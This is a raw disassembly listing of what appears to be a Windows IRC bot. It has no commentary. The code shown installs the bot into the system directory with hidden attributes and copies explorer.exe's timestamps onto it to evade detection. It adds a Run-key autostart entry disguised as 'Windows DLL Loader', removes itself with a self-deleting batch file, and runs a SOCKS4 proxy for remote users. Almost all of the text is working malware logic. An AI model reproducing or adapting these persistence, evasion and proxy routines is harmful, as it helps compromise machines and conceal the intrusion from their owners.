loc_4066FE: ; CODE XREF: sub_40668F+66�j
cmp [ebp+var_4], 10h
jge short loc_406719
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4066F7
; ---------------------------------------------------------------------------
loc_406719: ; CODE XREF: sub_40668F+73�j
mov eax, [ebp+arg_8]
and byte ptr [eax+10h], 0
leave
retn
sub_40668F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406722 proc near ; CODE XREF: sub_40A9CF+F40�p
var_424 = byte ptr -424h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 424h
cmp [ebp+arg_4], 0
jnz short loc_406736
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406736: ; CODE XREF: sub_406722+D�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+4]
cmp eax, 5Ch
jz short loc_406747
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406747: ; CODE XREF: sub_406722+1E�j
push 4
push offset aHkcr ; "HKCR"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_406769
mov [ebp+var_218], 80000000h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_406769: ; CODE XREF: sub_406722+39�j
push 4
push offset aHkcu ; "HKCU"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40678B
mov [ebp+var_218], 80000001h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_40678B: ; CODE XREF: sub_406722+5B�j
push 4
push offset aHklm ; "HKLM"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_4067AD
mov [ebp+var_218], 80000002h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_4067AD: ; CODE XREF: sub_406722+7D�j
push 4
push offset aHkus ; "HKUS"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_4067CF
mov [ebp+var_218], 80000003h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_4067CF: ; CODE XREF: sub_406722+9F�j
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_4067D4: ; CODE XREF: sub_406722+45�j
; sub_406722+67�j ...
mov eax, [ebp+arg_4]
add eax, 5
mov [ebp+arg_4], eax
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_210], eax
jmp short loc_4067FB
; ---------------------------------------------------------------------------
loc_4067EE: ; CODE XREF: sub_406722:loc_406858�j
mov eax, [ebp+var_210]
dec eax
mov [ebp+var_210], eax
loc_4067FB: ; CODE XREF: sub_406722+CA�j
cmp [ebp+var_210], 0
jnz short loc_406809
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406809: ; CODE XREF: sub_406722+E0�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_210]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jnz short loc_406858
mov eax, [ebp+var_210]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
push eax
call sub_416B40 ; strlen
pop ecx
cmp eax, 200h
jb short loc_40683A
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_40683A: ; CODE XREF: sub_406722+111�j
mov eax, [ebp+var_210]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40685A
; ---------------------------------------------------------------------------
loc_406858: ; CODE XREF: sub_406722+F6�j
jmp short loc_4067EE
; ---------------------------------------------------------------------------
loc_40685A: ; CODE XREF: sub_406722+134�j
cmp [ebp+var_210], 200h
jb short loc_40686B
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_40686B: ; CODE XREF: sub_406722+142�j
push [ebp+var_210]
push [ebp+arg_4]
lea eax, [ebp+var_418]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_210]
and [ebp+eax+var_418], 0
lea eax, [ebp+var_C]
push eax
push 1
push 0
lea eax, [ebp+var_418]
push eax
push [ebp+var_218]
call ds:dword_417008 ; RegOpenKeyExA
test eax, eax
jz short loc_4068B5
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_4068B5: ; CODE XREF: sub_406722+18C�j
mov [ebp+var_8], 1000h
push [ebp+var_8]
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_214], eax
lea eax, [ebp+var_8]
push eax
push [ebp+var_214]
lea eax, [ebp+var_4]
push eax
push 0
lea eax, [ebp+var_20C]
push eax
push [ebp+var_C]
call ds:dword_41700C ; RegQueryValueExA
test eax, eax
jnz loc_406A0C
cmp [ebp+var_4], 1
jz short loc_4068FF
cmp [ebp+var_4], 2
jnz short loc_406915
loc_4068FF: ; CODE XREF: sub_406722+1D5�j
push [ebp+var_214]
push offset aS ; "%s"
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
loc_406915: ; CODE XREF: sub_406722+1DB�j
cmp [ebp+var_4], 4
jnz short loc_406933
mov eax, [ebp+var_214]
push dword ptr [eax]
push offset a08x ; "%08X"
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
loc_406933: ; CODE XREF: sub_406722+1F7�j
cmp [ebp+var_4], 3
jnz loc_406A0C
push 180h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_420], eax
mov eax, [ebp+var_420]
and byte ptr [eax], 0
and [ebp+var_41C], 0
jmp short loc_40696D
; ---------------------------------------------------------------------------
loc_406960: ; CODE XREF: sub_406722+2C3�j
mov eax, [ebp+var_41C]
inc eax
mov [ebp+var_41C], eax
loc_40696D: ; CODE XREF: sub_406722+23C�j
mov eax, [ebp+var_41C]
cmp eax, [ebp+var_8]
jnb short loc_4069EA
mov eax, [ebp+var_214]
add eax, [ebp+var_41C]
movzx eax, byte ptr [eax]
push eax
push offset a02x ; "%02X"
lea eax, [ebp+var_424]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
push [ebp+var_420]
call sub_416B40 ; strlen
pop ecx
add eax, 3
cmp eax, 180h
jb short loc_4069D1
push [ebp+var_420]
push offset aS ; "%s"
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
mov eax, [ebp+var_420]
and byte ptr [eax], 0
loc_4069D1: ; CODE XREF: sub_406722+28E�j
lea eax, [ebp+var_424]
push eax
push [ebp+var_420]
call sub_416B70 ; _mbscat
pop ecx
pop ecx
jmp loc_406960
; ---------------------------------------------------------------------------
loc_4069EA: ; CODE XREF: sub_406722+254�j
push [ebp+var_420]
push offset aS ; "%s"
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
push [ebp+var_420]
call sub_416B4C ; free
pop ecx
loc_406A0C: ; CODE XREF: sub_406722+1CB�j
; sub_406722+215�j
push [ebp+var_214]
call sub_416B4C ; free
pop ecx
push [ebp+var_C]
call ds:dword_417028 ; RegCloseKey
locret_406A21: ; CODE XREF: sub_406722+F�j
; sub_406722+20�j ...
leave
retn
sub_406722 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A23 proc near ; CODE XREF: sub_40D043:loc_40D18D�p
; sub_40D871:loc_40DB71�p
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
push 104h
lea eax, [ebp+var_20C]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset asc_418DE4 ; "\\"
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push offset dword_41DC40
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_104]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_20C]
push eax
call ds:dword_4170AC ; DeleteFileA
push offset dword_4182AC
lea eax, [ebp+var_20C]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_108], eax
cmp [ebp+var_108], 0
jz short locret_406AE5
push [ebp+var_108]
push 1
push 2
push offset asc_418DE0 ; ":)"
call sub_416B7C ; fwrite
add esp, 10h
push [ebp+var_108]
call sub_416B82 ; fclose
pop ecx
lea eax, [ebp+var_20C]
push eax
call sub_406B81
pop ecx
locret_406AE5: ; CODE XREF: sub_406A23+90�j
leave
retn
sub_406A23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406AE7 proc near ; CODE XREF: sub_40D043+13D�p
; sub_40D871+2F3�p
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
push 104h
lea eax, [ebp+var_20C]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset asc_418DE4 ; "\\"
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push offset dword_41DC40
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_104]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push offset aRb ; "rb"
lea eax, [ebp+var_20C]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_108], eax
cmp [ebp+var_108], 0
jz short loc_406B7D
push [ebp+var_108]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
jmp short locret_406B7F
; ---------------------------------------------------------------------------
loc_406B7D: ; CODE XREF: sub_406AE7+83�j
xor eax, eax
locret_406B7F: ; CODE XREF: sub_406AE7+94�j
leave
retn
sub_406AE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406B81 proc near ; CODE XREF: sub_406A23+BC�p
; sub_406E8E+246�p
var_120 = dword ptr -120h
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 120h
push 104h
lea eax, [ebp+var_11C]
push eax
call ds:dword_417040 ; GetWindowsDirectoryA
push offset aExplorer_exe ; "\\explorer.exe"
lea eax, [ebp+var_11C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push 0
push 80h
push 3
push 0
push 1
push 80000000h
lea eax, [ebp+var_11C]
push eax
call ds:dword_417044 ; CreateFileA
mov [ebp+var_120], eax
cmp [ebp+var_120], 0FFFFFFFFh
jz short locret_406C4F
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+var_120]
call ds:dword_417048 ; GetFileTime
push [ebp+var_120]
call ds:dword_4170A4 ; CloseHandle
push 0
push 80h
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call ds:dword_417044 ; CreateFileA
mov [ebp+var_120], eax
cmp [ebp+var_120], 0FFFFFFFFh
jz short locret_406C4F
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+var_120]
call ds:dword_41704C ; SetFileTime
push [ebp+var_120]
call ds:dword_4170A4 ; CloseHandle
locret_406C4F: ; CODE XREF: sub_406B81+5A�j
; sub_406B81+A8�j
leave
retn
sub_406B81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406C51 proc near ; CODE XREF: sub_406E8E+133�p
; sub_406E8E+214�p ...
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 108h
push 0
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call ds:dword_417014 ; RegCreateKeyExA
cmp [ebp+arg_0], 0
jz short loc_406CE1
push 104h
lea eax, [ebp+var_108]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset asc_418DE4 ; "\\"
lea eax, [ebp+var_108]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_108]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_108]
push eax
call ds:dword_41703C ; lstrlen
inc eax
push eax
lea eax, [ebp+var_108]
push eax
push 1
push 0
push [ebp+arg_4]
push [ebp+var_4]
call ds:dword_417010 ; RegSetValueExA
jmp short loc_406CED
; ---------------------------------------------------------------------------
loc_406CE1: ; CODE XREF: sub_406C51+30�j
push [ebp+arg_4]
push [ebp+var_4]
call ds:dword_417004 ; RegDeleteValueA
loc_406CED: ; CODE XREF: sub_406C51+8E�j
push [ebp+var_4]
call ds:dword_417028 ; RegCloseKey
leave
retn
sub_406C51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406CF8 proc near ; CODE XREF: sub_406D47+2B�p
; sub_406E8E+253�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_C], eax
and [ebp+var_4], 0
jmp short loc_406D1D
; ---------------------------------------------------------------------------
loc_406D16: ; CODE XREF: sub_406CF8:loc_406D40�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_406D1D: ; CODE XREF: sub_406CF8+1C�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jnb short loc_406D42
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jnz short loc_406D40
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax+1]
mov [ebp+var_8], eax
loc_406D40: ; CODE XREF: sub_406CF8+39�j
jmp short loc_406D16
; ---------------------------------------------------------------------------
loc_406D42: ; CODE XREF: sub_406CF8+2B�j
mov eax, [ebp+var_8]
leave
retn
sub_406CF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D47 proc near ; CODE XREF: sub_406E8E+9�p
; sub_407148+9�p
var_108 = byte ptr -108h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 108h
push 104h
lea eax, [ebp+var_108]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
lea eax, [ebp+var_108]
push eax
call sub_406CF8
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and byte ptr [eax], 0
lea eax, [ebp+var_108]
push eax
call ds:dword_417038 ; SetCurrentDirectoryA
leave
retn
sub_406D47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D90 proc near ; CODE XREF: sub_406E8E+25A�p
; sub_407148+168�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push 8
push 4
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_20], eax
and [ebp+var_1C], 0
loc_406DA8: ; CODE XREF: sub_406D90:loc_406DDF�j
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+var_1C]
mov [ebp+ecx+var_18], al
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_20]
jnz short loc_406DDF
push offset a_bat ; ".bat"
mov eax, [ebp+var_1C]
lea eax, [ebp+eax+var_18]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_406DE1
; ---------------------------------------------------------------------------
loc_406DDF: ; CODE XREF: sub_406D90+37�j
jmp short loc_406DA8
; ---------------------------------------------------------------------------
loc_406DE1: ; CODE XREF: sub_406D90+4D�j
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
push 400h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_24], eax
lea eax, [ebp+var_18]
push eax
call ds:dword_4170AC ; DeleteFileA
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_18]
push eax
call ds:dword_417044 ; CreateFileA
mov [ebp+var_28], eax
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_406E2B
xor eax, eax
jmp short locret_406E8C
; ---------------------------------------------------------------------------
loc_406E2B: ; CODE XREF: sub_406D90+95�j
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
push [ebp+arg_0]
push [ebp+arg_0]
push offset a@echoOffDelete ; "@echo off\r\n:deleteagain\r\ndel /A:H /F %s"...
push [ebp+var_24]
call ds:dword_4171E0 ; wsprintfA
add esp, 18h
and [ebp+var_4], 0
push 0
lea eax, [ebp+var_4]
push eax
push [ebp+var_24]
call sub_416B40 ; strlen
pop ecx
push eax
push [ebp+var_24]
push [ebp+var_28]
call ds:dword_417068 ; WriteFile
push [ebp+var_28]
call ds:dword_4170A4 ; CloseHandle
push 0
push 0
push 0
lea eax, [ebp+var_18]
push eax
push offset aOpen ; "open"
push 0
call ds:dword_4171D0
push 1
pop eax
locret_406E8C: ; CODE XREF: sub_406D90+99�j
leave
retn
sub_406D90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E8E proc near ; CODE XREF: .text:loc_4169E1�p
var_368 = dword ptr -368h
var_338 = word ptr -338h
var_324 = byte ptr -324h
var_220 = dword ptr -220h
var_21C = byte ptr -21Ch
var_118 = byte ptr -118h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
push ebp
mov ebp, esp
sub esp, 368h
call sub_406D47
push 104h
lea eax, [ebp+var_324]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
and [ebp+var_14], 0
and [ebp+var_220], 0
jmp short loc_406ED1
; ---------------------------------------------------------------------------
loc_406EC4: ; CODE XREF: sub_406E8E:loc_406FF8�j
mov eax, [ebp+var_220]
inc eax
mov [ebp+var_220], eax
loc_406ED1: ; CODE XREF: sub_406E8E+34�j
mov eax, [ebp+var_220]
shl eax, 1
cmp off_418B88[eax*4], 0
jz loc_406FFD
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
push 104h
lea eax, [ebp+var_21C]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset asc_418DE4 ; "\\"
lea eax, [ebp+var_21C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
lea eax, [ebp+var_21C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_324]
push eax
lea eax, [ebp+var_21C]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_406FF8
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B8C[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
mov eax, [ebp+var_220]
shl eax, 1
push off_418B8C[eax*4]
push 1
call sub_406C51
add esp, 0Ch
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B8C[eax*4]
call sub_4105AD
pop ecx
jmp locret_407146
; ---------------------------------------------------------------------------
loc_406FF8: ; CODE XREF: sub_406E8E+E3�j
jmp loc_406EC4
; ---------------------------------------------------------------------------
loc_406FFD: ; CODE XREF: sub_406E8E+53�j
push [ebp+var_14]
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_14], eax
push 104h
lea eax, [ebp+var_118]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset asc_418DE4 ; "\\"
lea eax, [ebp+var_118]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push off_418B88[eax*4]
lea eax, [ebp+var_118]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_118]
push eax
call ds:dword_4170AC ; DeleteFileA
push 0
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_324]
push eax
call ds:dword_417060 ; CopyFileA
test eax, eax
jnz short loc_4070AF
push offset aPacked_exe ; "packed.exe"
push offset aWindowsDllLoad ; "Windows DLL Loader"
push 1
call sub_406C51
add esp, 0Ch
jmp locret_407146
; ---------------------------------------------------------------------------
loc_4070AF: ; CODE XREF: sub_406E8E+206�j
push 4
lea eax, [ebp+var_118]
push eax
call ds:dword_4170A8 ; SetFileAttributesA
push 2
lea eax, [ebp+var_118]
push eax
call ds:dword_4170A8 ; SetFileAttributesA
lea eax, [ebp+var_118]
push eax
call sub_406B81
pop ecx
lea eax, [ebp+var_324]
push eax
call sub_406CF8
pop ecx
push eax
call sub_406D90
pop ecx
push 44h
push 0
lea eax, [ebp+var_368]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_368], 44h
and [ebp+var_338], 0
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_368]
push eax
push 0
push 0
push 28h
push 1
push 0
push 0
lea eax, [ebp+var_118]
push eax
push 0
call ds:dword_41707C ; CreateProcessA
call ds:dword_417254 ; WSACleanup
push 0
call sub_416BFC ; exit
locret_407146: ; CODE XREF: sub_406E8E+165�j
; sub_406E8E+21C�j
leave
retn
sub_406E8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407148 proc near ; CODE XREF: .text:004031ED�p
; sub_40A9CF+145F�p ...
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
call sub_406D47
push 104h
lea eax, [ebp+var_20C]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
and [ebp+var_108], 0
jmp short loc_407187
; ---------------------------------------------------------------------------
loc_40717A: ; CODE XREF: sub_407148:loc_4072DB�j
mov eax, [ebp+var_108]
inc eax
mov [ebp+var_108], eax
loc_407187: ; CODE XREF: sub_407148+30�j
mov eax, [ebp+var_108]
shl eax, 1
cmp off_418B88[eax*4], 0
jz loc_4072E0
push 104h
lea eax, [ebp+var_104]
push eax
call ds:dword_417050 ; GetSystemDirectoryA
push offset asc_418DE4 ; "\\"
lea eax, [ebp+var_104]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
lea eax, [ebp+var_104]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_104]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_4072DB
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B8C[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
mov eax, [ebp+var_108]
shl eax, 1
push off_418B8C[eax*4]
push 0
call sub_406C51
add esp, 0Ch
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B8C[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_20C]
push eax
call sub_406CF8
pop ecx
push eax
call sub_406D90
pop ecx
test eax, eax
jz short loc_4072D9
push offset aPacked_exe ; "packed.exe"
push offset aQuitSUninstall ; "QUIT :%s uninstalled."
call sub_40D6CB
pop ecx
pop ecx
call ds:dword_417254 ; WSACleanup
push 0
call ds:dword_41705C ; ExitProcess
loc_4072D9: ; CODE XREF: sub_407148+170�j
jmp short locret_40732B
; ---------------------------------------------------------------------------
loc_4072DB: ; CODE XREF: sub_407148+D8�j
jmp loc_40717A
; ---------------------------------------------------------------------------
loc_4072E0: ; CODE XREF: sub_407148+4F�j
push offset aPacked_exe ; "packed.exe"
push offset aWindowsDllLoad ; "Windows DLL Loader"
push 0
call sub_406C51
add esp, 0Ch
lea eax, [ebp+var_20C]
push eax
call sub_406CF8
pop ecx
push eax
call sub_406D90
pop ecx
test eax, eax
jz short locret_40732B
push offset aPacked_exe ; "packed.exe"
push offset aQuitSUninstall ; "QUIT :%s uninstalled."
call sub_40D6CB
pop ecx
pop ecx
call ds:dword_417254 ; WSACleanup
push 0
call ds:dword_41705C ; ExitProcess
locret_40732B: ; CODE XREF: sub_407148:loc_4072D9�j
; sub_407148+1C2�j
leave
retn
sub_407148 endp
; ---------------------------------------------------------------------------
loc_40732D: ; DATA XREF: .text:00407792�o
push ebp
mov ebp, esp
mov eax, 16F0h
call sub_416BC0
push 1BDh
push dword ptr [ebp+8]
lea eax, [ebp-1C8h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
mov eax, [ebp-1C8h]
mov [ebp-5D4h], eax
push 0
push 408h
lea eax, [ebp-5D0h]
push eax
push dword ptr [ebp-5D4h]
call ds:dword_417248 ; recv
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jz short loc_40738F
cmp dword ptr [ebp-8], 0FFFFFFFFh
jnz short loc_407396
loc_40738F: ; CODE XREF: .text:00407387�j
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_407396: ; CODE XREF: .text:0040738D�j
movzx eax, byte ptr [ebp-5D0h]
cmp eax, 4
jnz short loc_4073BA
movzx eax, byte ptr [ebp-5CFh]
cmp eax, 1
jnz short loc_4073BA
mov dword ptr [ebp-16ECh], 1
jmp short loc_4073C1
; ---------------------------------------------------------------------------
loc_4073BA: ; CODE XREF: .text:004073A0�j
; .text:004073AC�j
and dword ptr [ebp-16ECh], 0
loc_4073C1: ; CODE XREF: .text:004073B8�j
mov eax, [ebp-16ECh]
mov [ebp-4], eax
movsx eax, byte ptr [ebp-1BEh]
test eax, eax
jz short loc_4073F5
push 10h
lea eax, [ebp-1BEh]
push eax
lea eax, [ebp-5C8h]
push eax
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jz short loc_4073F5
and dword ptr [ebp-4], 0
loc_4073F5: ; CODE XREF: .text:004073D3�j
; .text:004073EF�j
movsx eax, byte ptr [ebp-1Bh]
test eax, eax
jz short loc_407456
lea eax, [ebp-6E0h]
push eax
push dword ptr [ebp-5D4h]
call sub_4044F7
pop ecx
pop ecx
cmp dword ptr [ebp-4], 0
jz short loc_407423
mov dword ptr [ebp-16F0h], offset byte_41DE30
jmp short loc_40742D
; ---------------------------------------------------------------------------
loc_407423: ; CODE XREF: .text:00407415�j
mov dword ptr [ebp-16F0h], offset aRejected ; " rejected"
loc_40742D: ; CODE XREF: .text:00407421�j
push dword ptr [ebp-16F0h]
movzx eax, byte ptr [ebp-5D0h]
push eax
lea eax, [ebp-6E0h]
push eax
push offset dword_418EB8
lea eax, [ebp-1AEh]
push eax
call sub_40D53F
add esp, 14h
loc_407456: ; CODE XREF: .text:004073FB�j
cmp dword ptr [ebp-4], 0
jnz short loc_4074A0
push 8
push 0
lea eax, [ebp-5D0h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov byte ptr [ebp-5CFh], 5Bh
push 8
lea eax, [ebp-5D0h]
push eax
push dword ptr [ebp-5D4h]
call sub_4053BF
add esp, 0Ch
push dword ptr [ebp-5D4h]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_407649
; ---------------------------------------------------------------------------
loc_4074A0: ; CODE XREF: .text:0040745A�j
push 0Ah
lea eax, [ebp-5DCh]
push eax
push dword ptr [ebp-5CEh]
call ds:dword_417238 ; htons
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 2710h
push 0
lea eax, [ebp-5DCh]
push eax
push dword ptr [ebp-5CCh]
call ds:dword_41721C ; inet_ntoa
push eax
call sub_4050EA
add esp, 10h
mov [ebp-5E0h], eax
push 8
push 0
lea eax, [ebp-5D0h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
cmp dword ptr [ebp-5E0h], 0
jnz short loc_407537
